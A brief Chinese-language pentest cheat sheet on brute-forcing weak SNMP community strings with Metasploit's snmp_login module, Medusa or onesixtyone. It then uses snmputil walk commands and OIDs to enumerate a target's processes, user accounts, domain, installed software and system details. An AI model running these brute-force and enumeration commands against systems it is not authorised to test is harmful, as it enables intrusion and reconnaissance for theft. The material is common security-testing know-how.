Snmp弱口令探测和利用:
探测Community字符串的方法:
工具:MSF
use auxiliary/scanner/snmp/snmp_login
set pass_file 文件名
set rhosts
set stop_on_success true
set blank_passwords false
set threads 5
run
进行字符串的爆破
默认的字符串是“public
”和“private
”的,带有“ro”(只读)和“rw”(读和写)。
其他工具也可以 我这里比较推荐MSF 因为速度快 并且是一个集成的框架
其他工具:Medusa、onesixtyone
利用snmp的字符串的方法:
工具:snmputil,然后执行命令:
Snmputil.exe walk IP public .1.3.6.1.2.1.1
进一步的利用:
snmputil.exe walk 对方IP public .1.3.6.1.2.1.25.4.2.1.2 //**进程列表
snmputil.exe walk 对方IP public .1.3.6.1.4.77.1.2.25.1.1 //**用户列表
snmputil.exe get 对方IP public .1.3.6.1.4.77.1.4.1.0 //**域名
snmputil.exe walk 对方IP public .1.3.6.1.2.1.25.6.3.1.2 //**安装的软件
snmputil.exe walk 对方IP public .1.3.6.1.2.1.1 //**系统信息
其他工具有MSF中的auxiliary/scanner/snmp/snmp_enum
模块、snmpwalk工具等等
更多的利用方法大家可以参考
https://blog.csdn.net/archersaber39/article/details/78932252